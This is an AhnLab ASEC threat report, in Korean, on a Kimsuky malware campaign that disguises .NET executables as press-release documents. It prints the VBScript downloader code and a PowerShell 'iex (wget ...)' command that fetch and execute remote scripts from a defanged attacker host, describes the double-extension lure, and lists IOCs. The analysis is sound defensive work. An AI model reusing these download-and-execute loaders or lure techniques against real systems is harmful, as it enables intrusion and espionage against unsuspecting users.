다양한 주제의 보도자료를 사칭한 Kimsuky 공격시도

ASEC 분석팀은 보도자료로 위장한 악성코드가 유포되고 있음을 확인하였다. 해당 악성코드는 실행 시 정상 문서 파일을 로드하고 악성 URL로 접속을 시도한다. 연결 성공 시 해당 페이지에 존재하는 스크립트가 실행되며 이는 <대북관련 원고 요구사항을 가장한 APT 공격시도 (Kimsuky) > 에서 확인된 VBS 코드와 유사한 유형인 것으로 확인된다.

현재 확인된 파일은 다음과 같다.

  • 북한의 코로나19 확진자 발생 인정과 향후 한반도 정세 전망 .docx.exe
  • 1. 보도자료 (도내 청소년 대상, 찾아가는 드론 체험 교육 운영).hwp .exe
  • 2. 보도자료 (제17회 입양의 날 기념식 3년만에 개최).hwp .exe
  • 3.보도자료 (**디자인진흥원, 작은기업 디자인 애로해결 지원사업 추진).hwp .exe
  • 4. 보도자료 (**도, 가정의 달 맞이 SNS 이벤트 진행).hwp .exe

파일은 .NET으로 구성되어 있으며 문서 파일처럼 보이도록 한글 또는 워드 아이콘으로 위장하였다.

그림1. 실행 파일
  • 북한의 코로나19 확진자 발생 인정과 향후 한반도 정세 전망 .docx.exe

파일 실행 시 AppData 폴더에 Roamingtemp 이름으로 스크립트 파일을 생성한 후 “wscript.exe /e:vbscript /b [Roamingtemp 경로]\Roamingtemp” 명령어로 실행한다.

On Error Resume Next:
Set mx = CreateObject("Microsoft.XMLHTTP"):
mx.open "GET", "hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=1", False:
mx.Send:
Execute(mx.responseText)

Roamingtemp 파일 실행 후 hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach.docx에 접속하여 정상 워드 문서를 다운로드한다. 문서 파일은 실행 파일의 파일명으로 저장되며 현재 확인되는 파일은 다음과 같다.

그림2. 생성되는 워드 문서

참고로 해당 URL에 대해 확인한 결과 실행 파일과 동일한 제목의 워드 문서가 다운로드 되었던 이력이 확인되었다. 따라서 실행 파일이 유포되었을 당시에는 아래 워드 문서가 받아졌을 것으로 추정된다.

그림3. 유포 시점 다운로드 추정 워드 문서

이후 %Temp% 폴더에 e653d73e45833b6c 명의 파일이 존재하는지 확인하여 메시지 박스를 생성한다. 파일이 존재하지 않을 경우 e653d73e45833b6c 파일을 생성하고 현재 시간을 인코딩한 값을 저장한 후 메시지 박스를 생성한다. 만일 파일이 존재할 경우 파일에 저장된 시간을 현재 시간과 비교하여 그 차이가 0x7F days 보다 클 때만 메시지 박스를 생성한다. 메시지 박스를 생성하는 것 역시 정상 파일로 보이기 위함으로 추정된다.

그림4. 생성되는 메시지 박스

한글 파일로 위장한 악성코드의 경우 워드 문서 대신 한글 파일을 다운로드하며, 파일명에 .hwp와 .exe 사이의 공백이 특정 바이트만큼 존재해야 한글 파일이 정상적으로 생성되는 특징이 존재한다. 생성되는 Roamingtemp 파일은 앞서 설명한 파일과 동일하다.

파일명문서 다운로드 URL
1. 보도자료 (도내 청소년 대상, 찾아가는 드론 체험 교육 운영).hwp  .exehxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach1.hwp
2. 보도자료 (제17회 입양의 날 기념식 3년만에 개최) .hwp  .exehxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach2.hwp
3.보도자료 (**디자인진흥원, 작은기업 디자인 애로해결 지원사업 추진) .hwp  .exehxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach3.hwp
4. 보도자료 (**도, 가정의 달 맞이 SNS 이벤트 진행) .hwp  .exehxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach4.hwp
표1. 문서 다운로드 URL

실행 파일을 통해 생성되는 문서 파일은 모두 정상 파일로 사용자가 악성 행위 수행을 알아채지 못하도록 하기 위한 것으로 보인다. ‘3.보도자료 (**디자인진흥원, 작은기업 디자인 애로해결 지원사업 추진) .hwp  .exe’에서 생성되는 문서 파일은 다음과 같다.

그림5. ‘3.보도자료 (**디자인진흥원, 작은기업 디자인 애로해결 지원사업 추진) .hwp  .exe’에에서 생성되는 문서 파일

다운받아지는 파일의 내용과 유포한 파일명이 일치하지 않는 것으로 보아 현재도 다양한 파일명으로 해당 악성코드를 유포하고 있는 것으로 추정된다.

분석 당시 Roamingtemp에서 확인된 URL(hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=1)에는 <대북관련 원고 요구사항을 가장한 APT 공격시도 (Kimsuky)> 에서 확인된 VBS 코드와 유사한 스크립트 코드가 존재하였다.

그림6. Roamingtemp 에서 접속하는 페이지

해당 스크립트 실행 시 %AppData%\Microsoft\Windows\Templates 폴더에OfficeAppManifest_v[분]_[시]_[일,월].xml 명의 파일을 생성한 후 xml 파일을 실행하는 서비스를 Microsoft명으로 등록한다.

On Error Resume Next:With CreateObject(“InternetExplorer.Application”):.Navigate “hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=6”:Do while .busy:WScript.Sleep 100:Loop:bt=.Document.Body.InnerText:.Quit:End With:Execute(bt)
OfficeAppManifest_v[분]_[시]_[일,월].xml

그 후 브라우저 관련 설정을 변경하고 아래 파워쉘 명령어를 실행한다. 현재 명령어에 포함된 주소에 접속 되지 않아 파워쉘 실행 이후 행위는 확인이 불가하다.

cmd /c powershell -command “iex (wget hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/lib.php?idx=1).content; GetInfo -ur ‘hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload’;
파워쉘 명령어

최근 대북 관련 내용 뿐만 아니라 보도자료를 위장한 악성코드가 유포되고 있어 사용자의 주의가 필요하다. 파일을 실행하기 전 파일의 확장자를 확인하고 출처가 불분명한 파일의 실행을 자제해야한다.

현재 안랩 V3 제품은 해당 파일에 대해 다음과 같이 진단하고있다

[파일 진단]
Downloader/VBS.Generic
Trojan/Win.MSILKrypt.R492841

[IOC]
d6730f10a839d128e94b5aa05d9fb1ec
5573953bf4dafa96877dacf3435db228
3ad7a29a1f661034da0b3779a4046849
a15c386db0a3d0d208042d0982f21f37
34b7356722b992992f5382b0761466bc
94fdc2115ce7f4ab0234a1e26901cb1c
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=1
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=6
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/lib.php?idx=1
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:

5 2 votes
별점 주기
guest

3 댓글
Inline Feedbacks
View all comments
trackback

[…] at South Korea-based cybersecurity firm AhnLabs announced on Wednesday they had detected new, malware-laced press releases suspected to originate from […]

trackback

[…] S2W’s attribution of the malware to Kimsuky is based on overlaps with a server domain that was employed in a May 2022 campaign.  […]

trackback

[…] S2W’s attribution of the malware to Kimsuky relies on overlaps with a server area that was employed in a May 2022 campaign.  […]